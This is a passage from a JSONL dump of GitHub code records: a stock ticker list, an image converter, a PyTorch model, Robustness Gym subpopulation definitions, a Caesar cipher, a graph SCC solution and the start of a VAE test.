,\n'GTBO',\n'GTSI',\n'GULA',\n'GWSA',\n'GZCO',\n'HADE',\n'HAIS',\n'HATM',\n'HDFA',\n'HDIT',\n'HDTX',\n'HEAL',\n'HELI',\n'HERO',\n'HEXA',\n'HITS',\n'HKMU',\n'HMSP',\n'HOKI',\n'HOME',\n'HOMI',\n'HOPE',\n'HOTL',\n'HRME',\n'HRTA',\n'HRUM',\n'IATA',\n'IBFN',\n'IBOS',\n'IBST',\n'ICBP',\n'ICON',\n'IDEA',\n'IDPR',\n'IFII',\n'IFSH',\n'IGAR',\n'IIKP',\n'IKAI',\n'IKAN',\n'IKBI',\n'IMAS',\n'IMJS',\n'IMPC',\n'INAF',\n'INAI',\n'INCI',\n'INCO',\n'INDF',\n'INDO',\n'INDR',\n'INDS',\n'INDX',\n'INDY',\n'INKP',\n'INOV',\n'INPC',\n'INPP',\n'INPS',\n'INRU',\n'INTA',\n'INTD',\n'INTP',\n'IPAC',\n'IPCC',\n'IPCM',\n'IPOL',\n'IPPE',\n'IPTV',\n'IRRA',\n'ISAT',\n'ISSP',\n'ITIC',\n'ITMA',\n'ITMG',\n'JARR',\n'JAST',\n'JAWA',\n'JAYA',\n'JECC',\n'JGLE',\n'JIHD',\n'JKON',\n'JKSW',\n'JMAS',\n'JPFA',\n'JRPT',\n'JSKY',\n'JSMR',\n'JSPT',\n'JTPE',\n'KAEF',\n'KARW',\n'KAYU',\n'KBAG',\n'KBLI',\n'KBLM',\n'KBLV',\n'KBRI',\n'KDSI',\n'KDTN',\n'KEEN',\n'KEJU',\n'KETR',\n'KIAS',\n'KICI',\n'KIJA',\n'KINO',\n'KIOS',\n'KJEN',\n'KKES',\n'KKGI',\n'KLBF',\n'KLIN',\n'KMDS',\n'KMTR',\n'KOBX',\n'KOIN',\n'KONI',\n'KOPI',\n'KOTA',\n'KPAL',\n'KPAS',\n'KPIG',\n'KRAH',\n'KRAS',\n'KREN',\n'KRYA',\n'KUAS',\n'LABA',\n'LAND',\n'LAPD',\n'LCGP',\n'LCKM',\n'LEAD',\n'LFLO',\n'LIFE',\n'LINK',\n'LION',\n'LMAS',\n'LMPI',\n'LMSH',\n'LPCK',\n'LPGI',\n'LPIN',\n'LPKR',\n'LPLI',\n'LPPF',\n'LPPS',\n'LRNA',\n'LSIP',\n'LTLS',\n'LUCK',\n'LUCY',\n'MABA',\n'MAGP',\n'MAIN',\n'MAMI',\n'MAPA',\n'MAPB',\n'MAPI',\n'MARI',\n'MARK',\n'MASA',\n'MASB',\n'MAYA',\n'MBAP',\n'MBSS',\n'MBTO',\n'MCAS',\n'MCOL',\n'MCOR',\n'MDIA',\n'MDKA',\n'MDKI',\n'MDLN',\n'MDRN',\n'MEDC',\n'MEDS',\n'MEGA',\n'MERK',\n'META',\n'MFIN',\n'MFMI',\n'MGLV',\n'MGNA',\n'MGRO',\n'MICE',\n'MIDI',\n'MIKA',\n'MINA',\n'MIRA',\n'MITI',\n'MKNT',\n'MKPI',\n'MKTR',\n'MLBI',\n'MLIA',\n'MLPL',\n'MLPT',\n'MMIX',\n'MMLP',\n'MNCN',\n'MOLI',\n'MORA',\n'MPMX',\n'MPOW',\n'MPPA',\n'MPRO',\n'MRAT',\n'MREI',\n'MSIN',\n'MSKY',\n'MTDL',\n'MTEL',\n'MTFN',\n'MTLA',\n'MTMH',\n'MTPS',\n'MTRA',\n'MTSM',\n'MTWI',\n'MYOH',\n'MYOR',\n'MYRX',\n'MYTX',\n'NANO',\n'NASA',\n'NASI',\n'NATO',\n'NELY',\n'NETV',\n'NFCX',\n'NICK',\n'NICL',\n'NIKL',\n'NINE',\n'NIPS',\n'NIRO',\n'NISP',\n'NOBU',\n'NPGF',\n'NRCA',\n'NTBK',\n'NUSA',\n'NZIA',\n'OASA',\n'OBMD',\n'OCAP',\n'OILS',\n'OKAS',\n'OLIV',\n'OMED',\n'OMRE',\n'OPMS',\n'PADA',\n'PADI',\n'PALM',\n'PAMG',\n'PANI',\n'PANR',\n'PANS',\n'PBID',\n'PBRX',\n'PBSA',\n'PCAR',\n'PDES',\n'PDPP',\n'PEGE',\n'PEHA',\n'PGAS',\n'PGJO',\n'PGLI',\n'PGUN',\n'PICO',\n'PJAA',\n'PKPK',\n'PLAN',\n'PLAS',\n'PLIN',\n'PMJS',\n'PMMP',\n'PNBN',\n'PNBS',\n'PNGO',\n'PNIN',\n'PNLF',\n'PNSE',\n'POLA',\n'POLI',\n'POLL',\n'POLU',\n'POLY',\n'POOL',\n'PORT',\n'POSA',\n'POWR',\n'PPGL',\n'PPRE',\n'PPRO',\n'PRAS',\n'PRAY',\n'PRDA',\n'PRIM',\n'PSAB',\n'PSDN',\n'PSGO',\n'PSKT',\n'PSSI',\n'PTBA',\n'PTDU',\n'PTIS',\n'PTPP',\n'PTPW',\n'PTRO',\n'PTSN',\n'PTSP',\n'PUDP',\n'PURA',\n'PURE',\n'PURI',\n'PWON',\n'PYFA',\n'PZZA',\n'RAFI',\n'RAJA',\n'RALS',\n'RANC',\n'RBMS',\n'RCCC',\n'RDTX',\n'REAL',\n'RELI',\n'RICY',\n'RIGS',\n'RIMO',\n'RISE',\n'RMBA',\n'RMKE',\n'ROCK',\n'RODA',\n'RONY',\n'ROTI',\n'RSGK',\n'RUIS',\n'RUNS',\n'SAFE',\n'SAME',\n'SAMF',\n'SAPX',\n'SATU',\n'SBAT',\n'SBMA',\n'SCCO',\n'SCMA',\n'SCNP',\n'SCPI',\n'SDMU',\n'SDPC',\n'SDRA',\n'SEMA',\n'SFAN',\n'SGER',\n'SGRO',\n'SHID',\n'SHIP',\n'SICO',\n'SIDO',\n'SILO',\n'SIMA',\n'SIMP',\n'SINI',\n'SIPD',\n'SKBM',\n'SKLT',\n'SKRN',\n'SKYB',\n'SLIS',\n'SMAR',\n'SMBR',\n'SMCB',\n'SMDM',\n'SMDR',\n'SMGR',\n'SMKL',\n'SMKM',\n'SMMA',\n'SMMT',\n'SMRA',\n'SMRU',\n'SMSM',\n'SNLK',\n'SOCI',\n'SOFA',\n'SOHO'
,\n'SONA',\n'SOSS',\n'SOTS',\n'SPMA',\n'SPTO',\n'SQBI',\n'SQMI',\n'SRAJ',\n'SRIL',\n'SRSN',\n'SRTG',\n'SSIA',\n'SSMS',\n'SSTM',\n'STAA',\n'STAR',\n'STTP',\n'SUGI',\n'SULI',\n'SUPR',\n'SURE',\n'SWAT',\n'SWID',\n'TALF',\n'TAMA',\n'TAMU',\n'TAPG',\n'TARA',\n'TAXI',\n'TAYS',\n'TBIG',\n'TBLA',\n'TBMS',\n'TCID',\n'TCPI',\n'TDPM',\n'TEBE',\n'TECH',\n'TELE',\n'TFAS',\n'TFCO',\n'TGKA',\n'TGRA',\n'TIFA',\n'TINS',\n'TIRA',\n'TIRT',\n'TKIM',\n'TLDN',\n'TLKM',\n'TMAS',\n'TMPO',\n'TNCA',\n'TOBA',\n'TOOL',\n'TOPS',\n'TOTL',\n'TOTO',\n'TOWR',\n'TOYS',\n'TPIA',\n'TPMA',\n'TRAM',\n'TRGU',\n'TRIL',\n'TRIM',\n'TRIN',\n'TRIO',\n'TRIS',\n'TRJA',\n'TRST',\n'TRUE',\n'TRUK',\n'TRUS',\n'TSPC',\n'TUGU',\n'TURI',\n'UANG',\n'UCID',\n'UFOE',\n'ULTJ',\n'UNIC',\n'UNIQ',\n'UNIT',\n'UNSP',\n'UNTR',\n'UNVR',\n'URBN',\n'UVCR',\n'VICI',\n'VICO',\n'VINS',\n'VIVA',\n'VOKS',\n'VRNA',\n'WAPO',\n'WEGE',\n'WEHA',\n'WGSH',\n'WICO',\n'WIFI',\n'WIIM',\n'WIKA',\n'WINR',\n'WINS',\n'WIRG',\n'WMPP',\n'WMUU',\n'WOMF',\n'WOOD',\n'WOWS',\n'WSBP',\n'WSKT',\n'WTON',\n'XCID',\n'YELO',\n'YPAS',\n'YULE',\n'ZATA',\n'ZBRA',\n'ZINC',\n'ZONE',\n'ZYRX']","repo_name":"gammarinaldi/wina_idx","sub_path":"market_data_updater/api/stock_all.py","file_name":"stock_all.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"hi","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"42880341755","text":"import os\nimport tqdm\nimport h5py\nimport numpy as np\nfrom PIL import Image\n\n\npath = \"./inputs/val/\"\nsave_path = \"./inputs/rgb/\"\nif not os.path.exists(save_path): os.makedirs(save_path)\n\nfor i in tqdm.tqdm(os.listdir(path)):\n path1 = os.path.join(path, i)\n for j in os.listdir(path1):\n h5 = h5py.File(os.path.join(path1, j), 'r')\n depth = h5['depth'][:]\n rgb = h5['rgb'][:]\n depth = np.array(depth)\n rgb = np.transpose(np.array(rgb), (1, 2, 0))\n depth = Image.fromarray(depth.astype('uint8'))\n rgb = Image.fromarray(np.uint8(rgb))\n rgb = rgb.resize((640*2, 480*2))\n rgb.save(os.path.join(save_path, os.path.splitext(j)[0]+'.png'))\n\n# classes = [d for d in os.listdir(path) if os.path.isdir(os.path.join(path, d))]\n# print(classes)\n# l = [j for i in os.listdir(path) for j in os.listdir(os.path.join(path, i))]\n# print(l)","repo_name":"yeluoo/3d-photo-inpainting","sub_path":"sparse-to-dense/h5img.py","file_name":"h5img.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70900257449","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\n\ndef loss_fn(pred, target, projectors, edges=None):\n loss = 0.\n N_cams = len(projectors)\n if edges is not None:\n for edge_info in edges:\n weight = edge_info[3]\n length = edge_info[2]\n dist = (weight * torch.abs(length - torch.square(pred[:,edge_info[0]:edge_info[0]+1,:].squeeze() - pred[:,edge_info[1]:edge_info[1]+1,:].squeeze()))).sum()\n loss += dist\n for i in range(N_cams):\n pred = pred.reshape(-1, 3)\n projector = projectors[i]\n projected = projector(pred).view(-1)\n cur_target = target[:,i*2:(i*2)+2,:].reshape(-1)\n visible_projected = projected[cur_target != -1.]\n visible_cur_target = cur_target[cur_target != -1.]\n dist = torch.square(visible_projected - visible_cur_target).sum()\n loss += dist\n return loss\n \n\nclass Model(nn.Module):\n def __init__(self, \n input_depth, \n input_height, \n input_width, \n padding=1, \n stride=1, \n poolstride1=3, \n poolstride2=2, \n dilation=1, \n kernel_size1=4, \n 
kernel_size2=2, \n kernel_pool1=3, \n kernel_pool2=2):\n super().__init__()\n convs = []\n final_depth = input_depth\n final_height = input_height\n final_width = input_width\n for i in range(4,8):\n conv1 = nn.Conv3d(i,i,kernel_size1,stride=stride,padding=padding)\n final_depth = math.floor(((final_depth + (2*padding) - (dilation * (kernel_size1 - 1)) - 1)/stride)+1)\n final_height = math.floor(((final_height + (2*padding) - (dilation * (kernel_size1 - 1)) - 1)/stride)+1)\n final_width = math.floor(((final_width + (2*padding) - (dilation * (kernel_size1 - 1)) - 1)/stride)+1)\n pool1 = nn.MaxPool3d(kernel_pool1,stride=poolstride1,padding=padding)\n final_depth = math.floor(((final_depth + (2*padding) - (dilation * (kernel_pool1 - 1)) - 1)/poolstride1)+1)\n final_height = math.floor(((final_height + (2*padding) - (dilation * (kernel_pool1 - 1)) - 1)/poolstride1)+1)\n final_width = math.floor(((final_width + (2*padding) - (dilation * (kernel_pool1 - 1)) - 1)/poolstride1)+1)\n conv2 = nn.Conv3d(i,i+1,kernel_size2,stride=stride,padding=padding)\n final_depth = math.floor(((final_depth + (2*padding) - (dilation * (kernel_size2 - 1)) - 1)/stride)+1)\n final_height = math.floor(((final_height + (2*padding) - (dilation * (kernel_size2 - 1)) - 1)/stride)+1)\n final_width = math.floor(((final_width + (2*padding) - (dilation * (kernel_size2 - 1)) - 1)/stride)+1)\n pool2 = nn.MaxPool3d(kernel_pool2,stride=poolstride2,padding=padding)\n final_depth = math.floor(((final_depth + (2*padding) - (dilation * (kernel_pool2 - 1)) - 1)/poolstride2)+1)\n final_height = math.floor(((final_height + (2*padding) - (dilation * (kernel_pool2 - 1)) - 1)/poolstride2)+1)\n final_width = math.floor(((final_width + (2*padding) - (dilation * (kernel_pool2 - 1)) - 1)/poolstride2)+1)\n convs.append(conv1)\n convs.append(pool1)\n convs.append(conv2)\n convs.append(pool2)\n self.conv_net = nn.Sequential(*convs)\n after_conv_num = final_depth*final_height*final_width*8\n self.after_conv_num = after_conv_num\n self.l1 = nn.Linear(after_conv_num, after_conv_num //2)\n self.l2 = nn.Linear(after_conv_num // 2, 8 * 3)\n \n def forward(self, x):\n conv_out = self.conv_net(x).view(-1, self.after_conv_num)\n lin_out = self.l2(F.relu(self.l1(conv_out)))\n out = lin_out.view(-1,8,3)\n return out","repo_name":"patrickdwyer33/Tracking_3d","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42742960828","text":"from lbt.tools.robustnessgym.base_subpopulation import BaseSubpopulation\nfrom lbt.tools.robustnessgym import register_lbtsubpop\nfrom robustnessgym import (\n LengthSubpopulation,\n HasPhrase,\n HasAnyPhrase,\n)\n\nimport requests\n\nfrom robustnessgym import Spacy\nfrom robustnessgym import ScoreSubpopulation, Identifier\nimport pandas as pd\nimport itertools\nfrom functools import partial\n\n# TODO: ASN --> Identity Phrases, Emoji,\n\n\n@register_lbtsubpop(\"entities\")\nclass EntitySubpopulation(BaseSubpopulation):\n def __init__(self):\n self.name = \"entities\"\n self.entity_types = [\n \"PERSON\",\n \"NORP\",\n \"FAC\",\n \"ORG\",\n \"GPE\",\n \"LOC\",\n \"PRODUCT\",\n \"EVENT\",\n \"WORK_OF_ART\",\n \"LAW\",\n \"LANGUAGE\",\n \"DATE\",\n \"TIME\",\n \"PERCENT\",\n \"MONEY\",\n \"QUANTITY\",\n \"ORDINAL\",\n \"CARDINAL\",\n ]\n\n def score_fn(self, batch, columns, entity, spacy):\n try:\n entites_list = Spacy.retrieve(\n batch, columns, proc_fns=Spacy.entities\n )\n except 
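`Model.__init__` above re-derives floor((n + 2p − d·(k−1) − 1)/s + 1) — PyTorch's documented Conv3d/MaxPool3d shape rule — after every layer, once per spatial axis. Folding it into a helper keeps the constructor readable (a sketch, not part of the source):

```python
import math

def conv_out(n, kernel, stride=1, padding=0, dilation=1):
    """One spatial dim after Conv3d/MaxPool3d: the
    floor((n + 2p - d*(k-1) - 1) / s + 1) rule from the PyTorch docs."""
    return math.floor((n + 2 * padding - dilation * (kernel - 1) - 1) / stride + 1)

d = h = w = 64                               # made-up input volume
for kernel, stride in [(4, 1), (3, 3), (2, 1), (2, 2)]:   # conv1, pool1, conv2, pool2
    d, h, w = (conv_out(x, kernel, stride, padding=1) for x in (d, h, w))
print(d, h, w)                               # spatial size after one block stack
```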
ValueError:\n spacy_op = spacy(batch, columns)\n entites_list = Spacy.retrieve(\n spacy_op, columns, proc_fns=Spacy.entities\n )\n overall_batch_score = []\n for entities in entites_list:\n ents = set(entity[\"label\"] for entity in entities)\n if entity in ents:\n overall_batch_score.append(1)\n else:\n overall_batch_score.append(0)\n return overall_batch_score\n\n def get_subpops(self, spacy):\n EntitiesSubpopulation = lambda entity, score_fn: ScoreSubpopulation(\n identifiers=[Identifier(f\"{entity}\")],\n intervals=[(1, 1)],\n score_fn=score_fn,\n )\n\n entity_subpops = []\n for entity in self.entity_types:\n entity_subpops.append(\n EntitiesSubpopulation(\n entity, partial(self.score_fn, entity=entity, spacy=spacy)\n )\n )\n return entity_subpops\n\n\n@register_lbtsubpop(\"pos\")\nclass POSSubpopulation(BaseSubpopulation):\n def __init__(self):\n self.name = \"POS\"\n self.universalpos = [\n \"ADJ\",\n \"ADP\",\n \"ADV\",\n \"AUX\",\n \"CONJ\",\n \"CCONJ\",\n \"DET\",\n \"INTJ\",\n \"NOUN\",\n \"NUM\",\n \"PART\",\n \"PRON\",\n \"PROPN\",\n \"PUNCT\",\n \"SCONJ\",\n \"SYM\",\n \"VERB\",\n \"X\",\n \"EOL\",\n \"SPACE\",\n ]\n\n def score_fn(self, batch, columns, pos, spacy):\n try:\n spacy_annotations = Spacy.retrieve(batch, columns)\n except ValueError:\n spacy_op = spacy(batch, columns)\n spacy_annotations = Spacy.retrieve(spacy_op, columns)\n\n overall_batch_score = []\n for sample_annotation in spacy_annotations:\n pos_in_sample = set(\n token[\"pos\"] for token in sample_annotation[\"tokens\"]\n )\n if pos in pos_in_sample:\n overall_batch_score.append(1)\n else:\n overall_batch_score.append(0)\n\n return overall_batch_score\n\n def get_subpops(self, spacy):\n POSSubpopulation = lambda pos, score_fn: ScoreSubpopulation(\n identifiers=[Identifier(f\"{pos}\")],\n intervals=[(1, 1)],\n score_fn=score_fn,\n )\n\n pos_subpops = []\n for pos in self.universalpos:\n pos_subpops.append(\n POSSubpopulation(\n pos, partial(self.score_fn, pos=pos, spacy=spacy)\n )\n )\n return pos_subpops\n\n\n@register_lbtsubpop(\"gender_bias\")\nclass GenderBiasSubpopulation(BaseSubpopulation):\n def __init__(self):\n \"\"\"\n Measures performance on gender co-occurence pairs\n \"\"\"\n self.name = \"gender_bias\"\n self.female_identity = [\n \"she\",\n \"her\",\n \"herself\",\n \"girl\",\n \"woman\",\n \"women\",\n \"females\",\n \"female\",\n \"girls\",\n \"feminine\",\n ]\n self.male_identity = [\n \"he\",\n \"him\",\n \"himself\",\n \"boy\",\n \"man\",\n \"men\",\n \"males\",\n \"male\",\n \"boys\",\n \"masculine\",\n ]\n self.non_binary_identity = [\n \"they\",\n \"them\",\n \"theirs\",\n \"their\",\n \"themself\",\n ]\n self.gender_categories = {\n \"female\": self.female_identity,\n \"male\": self.male_identity,\n \"non_binary\": self.non_binary_identity,\n }\n\n self.career_words = [\n \"executive\",\n \"professional\",\n \"corporation\",\n \"salary\",\n \"office\",\n \"business\",\n \"career\",\n ]\n self.family_words = [\n \"home\",\n \"parents\",\n \"children\",\n \"family\",\n \"cousin\",\n \"marriage\",\n \"wedding\",\n \"relatives\",\n ]\n self.math_words = [\n \"math\",\n \"algebra\",\n \"geometry\",\n \"calculus\",\n \"equation\",\n \"compute\",\n \"numbers\",\n \"addition\",\n ]\n self.arts_words = [\n \"poetry\",\n \"art\",\n \"dance\",\n \"literature\",\n \"novel\",\n \"symphony\",\n \"drama\",\n ]\n self.science_words = [\n \"science\",\n \"technology\",\n \"physics\",\n \"chemistry\",\n \"Einstein\",\n \"NASA\",\n \"experiment\",\n \"astronomy\",\n ]\n\n self.domains = {\n \"career\": 
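`get_subpops` above binds the loop variable with `functools.partial(self.score_fn, entity=entity)` rather than a bare lambda — a lambda would close over the variable, not its value, and every subpopulation would end up scoring the last entity. The difference in miniature:

```python
from functools import partial

tags = ['PERSON', 'ORG', 'GPE']

late = [lambda x: (t, x) for t in tags]                   # closes over t itself
bound = [partial(lambda t, x: (t, x), t) for t in tags]   # freezes t's value

print([f(0)[0] for f in late])    # ['GPE', 'GPE', 'GPE'] -- late binding bites
print([f(0)[0] for f in bound])   # ['PERSON', 'ORG', 'GPE']
```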
self.career_words,\n \"family\": self.family_words,\n \"math\": self.math_words,\n \"arts\": self.arts_words,\n \"science\": self.science_words,\n }\n\n def score_fn(self, batch, columns, pair):\n overall_batch_score = []\n for text in batch[columns[0]]:\n if pair[0] in text and pair[1] in text:\n overall_batch_score.append(1)\n else:\n overall_batch_score.append(0)\n return overall_batch_score\n\n def build_cooccurence_pairs(self, gender_categories: dict, domains: dict):\n bias_pairs = []\n for _, gender_list in gender_categories.items():\n for _, phrase_list in domains.items():\n bias_pairs.extend(\n [\n pair\n for pair in itertools.product(gender_list, phrase_list)\n ]\n )\n return bias_pairs\n\n def get_subpops(self, spacy):\n bias_pairs = self.build_cooccurence_pairs(\n self.gender_categories, self.domains\n )\n BiasCooccurenceSubpopulation = (\n lambda pair, score_fn: ScoreSubpopulation(\n identifiers=[Identifier(f\"{pair[0]}_{pair[1]}\")],\n intervals=[(1, 1)],\n score_fn=self.score_fn,\n )\n )\n\n bias_subpops = []\n for pair in bias_pairs:\n bias_subpops.append(\n BiasCooccurenceSubpopulation(\n pair, partial(self.score_fn, pair=pair)\n )\n )\n return bias_subpops\n\n\n@register_lbtsubpop(\"positive_sentiment\")\nclass PositiveSentimentSubpopulation(BaseSubpopulation):\n def __init__(self):\n \"\"\"\n Slice of dataset which contains positive sentiment carrying words\n \"\"\"\n self.name = \"positive_sentiment\"\n self.positive_words_list = \"https://gist.githubusercontent.com/mkulakowski2/4289437/raw/1bb4d7f9ee82150f339f09b5b1a0e6823d633958/positive-words.txt\"\n\n def score_fn(self, batch, columns):\n pass\n\n def get_positive_words(self):\n response = requests.get(self.positive_words_list)\n _, words = (\n response.text.split(\"\\n\\n\")[0],\n response.text.split(\"\\n\\n\")[1],\n )\n word_list = words.split(\"\\n\")\n return word_list\n\n def get_subpops(self, spacy):\n return [\n HasAnyPhrase(\n phrase_groups=[self.get_positive_words()],\n identifiers=[Identifier(\"Positive Sentiment Words\")],\n )\n ]\n\n\n@register_lbtsubpop(\"negative_sentiment\")\nclass NegativeSentimentSubpopulation(BaseSubpopulation):\n def __init__(self):\n \"\"\"\n Slice of dataset which contains negative sentiment carrying words\n \"\"\"\n self.name = \"positive_sentiment\"\n self.negative_words_list = \"https://gist.githubusercontent.com/mkulakowski2/4289441/raw/dad8b64b307cd6df8068a379079becbb3f91101a/negative-words.txt\"\n\n def score_fn(self, batch, columns):\n pass\n\n def get_negative_words(self):\n response = requests.get(self.negative_words_list)\n _, words = (\n response.text.split(\"\\n\\n\")[0],\n response.text.split(\"\\n\\n\")[1],\n )\n word_list = words.split(\"\\n\")\n return word_list\n\n def get_subpops(self, spacy):\n return [\n HasAnyPhrase(\n phrase_groups=[self.get_negative_words()],\n identifiers=[Identifier(\"Negative Sentiment Words\")],\n )\n ]\n\n\n@register_lbtsubpop(\"naughty_and_obscene\")\nclass NaughtyObsceneSubpopulation(BaseSubpopulation):\n def __init__(self):\n \"\"\"\n Slice of dataset which contains naught + obscene words\n \"\"\"\n self.name = \"naughty_and_obscene\"\n self.word_list = \"https://raw.githubusercontent.com/LDNOOBW/List-of-Dirty-Naughty-Obscene-and-Otherwise-Bad-Words/master/en\"\n\n def score_fn(self, batch, columns):\n pass\n\n def get_naughty_obscene_word_list(self):\n response = requests.get(self.word_list)\n return response.text.split(\"\\n\")\n\n def get_subpops(self, spacy):\n return [\n HasAnyPhrase(\n 
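`build_cooccurence_pairs` crosses every identity term with every domain term through `itertools.product`, and `score_fn` then tests `pair[0] in text` — plain substring matching, so "he" also fires on "the" or "she". If whole-word hits are wanted, a word-boundary regex is the usual fix (a sketch, not the module's current behaviour):

```python
import re

def has_word(text, word):
    """True only for whole-word occurrences, unlike `word in text`."""
    return re.search(rf'\b{re.escape(word)}\b', text) is not None

print('he' in 'the weather')            # True  -- substring false positive
print(has_word('the weather', 'he'))    # False
print(has_word('he went home', 'he'))   # True
```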
phrase_groups=[self.get_naughty_obscene_word_list()],\n identifiers=[Identifier(\"Naughty and Obscene Words\")],\n )\n ]\n\n\n@register_lbtsubpop(\"sentence_length\")\nclass SentenceLengthSubpopulation(BaseSubpopulation):\n def __init__(self):\n \"\"\"\n Sentence length based slices\n \"\"\"\n self.name = \"sentence_length\"\n\n def score_fn(self, batch, columns):\n pass\n\n def get_subpops(self, spacy):\n return [\n LengthSubpopulation(\n intervals=[\n (0, 20),\n (20, 40),\n (40, 60),\n (60, 80),\n (80, 100),\n (100, 120),\n (120, 140),\n ]\n )\n ]\n","repo_name":"HazyResearch/ludwig-benchmarking-toolkit","sub_path":"lbt/tools/robustnessgym/lbt_subpopulations.py","file_name":"lbt_subpopulations.py","file_ext":"py","file_size_in_byte":11113,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"18632283630","text":"import re\nimport Corpus\nimport nltk\n\ndef encrypt(string:str ,key: int) -> str:\n cipher = ''\n for char in string:\n new_char = char \n if new_char.isalpha():\n shift = 97 if char.islower() else 65\n new_char = chr((ord(char) + key - shift) % 26 + shift)\n cipher+=new_char\n return cipher\n\ndef decrypt(string:str , key:int) -> str:\n return encrypt(string , key*-1)\n\ndef crack(string:str)-> str:\n success_cracked= \"\"\n max_percentage = 50\n \n for key in range (0,26):\n # nltk.download('words')\n word_list = nltk.corpus.words.words()\n decrypted = decrypt(string,key)\n words = decrypted.split()\n english_count = 0\n for word in words:\n cleaned_word = re.sub(r\"[^a-zA-Z]+\", \"\", word).lower()\n if cleaned_word in word_list:\n english_count+=1\n \n english_percentage = int(english_count / len(words) * 100)\n if english_percentage > max_percentage:\n max_percentage = english_percentage\n success_cracked = decrypted\n \n return success_cracked\n \n\nif __name__ == \"__main__\":\n print(encrypt('Wow a dark and stormy night.', 3))\n print(decrypt('Zrz d gdun dqg vwrupb qljkw.',3))\n print(crack('Zrz d gdun dqg vwrupb qljkw.'))","repo_name":"mhn998/caesar-cipher","sub_path":"caesar_cipher/caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8798127829","text":"class scc_graph:\n \n def __init__(self, N):\n self.N = N\n self.edges = []\n \n def csr(self):\n self.start = [0]*(self.N+1)\n self.elist = [0]*len(self.edges)\n for e in self.edges:\n self.start[e[0]+1] += 1\n for i in range(1, self.N+1):\n self.start[i] += self.start[i-1]\n counter = self.start[:]\n for e in self.edges:\n self.elist[counter[e[0]]] = e[1]\n counter[e[0]] += 1\n \n def add_edge(self, v, w):\n self.edges.append((v, w))\n \n def scc_ids(self):\n self.csr()\n N = self.N\n now_ord = group_num = 0\n visited = []\n low = [0]*N\n order = [-1]*N\n ids = [0]*N\n parent = [-1]*N\n stack = []\n for i in range(N):\n if order[i] == -1:\n stack.append(i)\n stack.append(i)\n while stack:\n v = stack.pop()\n if order[v] == -1:\n low[v] = order[v] = now_ord\n now_ord += 1\n visited.append(v)\n for i in range(self.start[v], self.start[v+1]):\n to = self.elist[i]\n if order[to] == -1:\n stack.append(to)\n stack.append(to)\n parent[to] = v\n else:\n low[v] = min(low[v], order[to])\n else:\n if low[v] == order[v]:\n while True:\n u = visited.pop()\n order[u] = N\n ids[u] = group_num\n if u == v:\n break\n group_num += 1\n if parent[v] != -1:\n low[parent[v]] = min(low[parent[v]], low[v])\n for i, x in enumerate(ids):\n 
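`encrypt` above shifts only alphabetic characters within their own case, and `decrypt` simply negates the key, so `decrypt(encrypt(s, k), k) == s` for any integer k; `crack` then just scores each of the 26 candidate keys by its share of dictionary words. The round-trip property checked standalone (functions restated without the nltk dependency):

```python
def encrypt(s, key):
    out = []
    for ch in s:
        if ch.isalpha():
            base = 97 if ch.islower() else 65   # keep case, skip punctuation
            ch = chr((ord(ch) + key - base) % 26 + base)
        out.append(ch)
    return ''.join(out)

def decrypt(s, key):
    return encrypt(s, -key)

msg = 'Wow a dark and stormy night.'
for key in (3, 13, 29):                 # 29 wraps around: same cipher as key 3
    assert decrypt(encrypt(msg, key), key) == msg
print(encrypt(msg, 3))                  # Zrz d gdun dqg vwrupb qljkw.
```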
ids[i] = group_num-1-x\n        \n        return group_num, ids\n    # returns the number of groups and a list giving each vertex's group id\n    # smaller group ids come first in topological order,\n    # i.e. there is no path from a larger group id to a smaller one\n    # vertices that are not part of any cycle form singleton groups\n    \n    def scc(self): # returns a list whose elements are the strongly connected components\n        group_num, ids = self.scc_ids()\n        groups = [[] for _ in range(group_num)]\n        for i, x in enumerate(ids):\n            groups[x].append(i)\n        return groups\n\nimport sys,random,bisect\nfrom collections import deque,defaultdict\nfrom heapq import heapify,heappop,heappush\nfrom itertools import permutations\nfrom math import gcd,log\n\ninput = lambda :sys.stdin.readline().rstrip()\nmi = lambda :map(int,input().split())\nli = lambda :list(mi())\n\nN,M = mi()\nG = scc_graph(N)\nE = []\nfor _ in range(M):\n    u,v = mi()\n    E.append((u-1,v-1))\n    G.add_edge(u-1,v-1)\n\nn,ids = G.scc_ids()\nedge = [[] for v in range(n)]\nfor u,v in E:\n    if ids[u]==ids[v]:\n        continue\n    edge[ids[u]].append(ids[v])\n\ncnt = [0] * n\nfor v in range(N):\n    cnt[ids[v]] += 1\n\ncheck = [False] * n\nres = 0\nfor i in range(n)[::-1]:\n    if cnt[i] > 1:\n        check[i] = True\n    for nv in edge[i]:\n        check[i] |= check[nv]\n    if check[i]:\n        res += cnt[i]\n\nprint(res)\n\n\n","repo_name":"shimamura10/Atcoder","sub_path":"過去問/ABC245/f_scc.py","file_name":"f_scc.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6570568485","text":"from unittest import TestCase\n\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision.datasets import MNIST\nfrom cnn.convmodel import ConvModel\nfrom cnn.convneuralblock import ConvNeuralBlock\nfrom cnn.deconvneuralblock import DeConvNeuralBlock\nfrom cnn.deconvmodel import DeConvModel\nfrom nnet.hyperparams import HyperParams\nfrom autoencoder.convvaemodel import ConvVAEModel\nfrom autoencoder.convvae import ConvVAE\nfrom autoencoder.variationalneuralblock import VariationalNeuralBlock\n\n\nclass TestConvVAE(TestCase):\n    def test_train_and_eval(self):\n        try:\n            input_channels = 1 # Gray colors 1 feature\n            in_channels = 5\n            output_channels = 10 # 10 digits => 10 features/classes\n            conv_2d_model = TestConvVAE.__create_2d_conv_model(\"Conv2d\", input_channels, in_channels, output_channels)\n\n            latent_size = 16\n            fc_hidden_dim = 22\n            flatten_input = 90\n            variational_block = VariationalNeuralBlock(flatten_input, fc_hidden_dim, 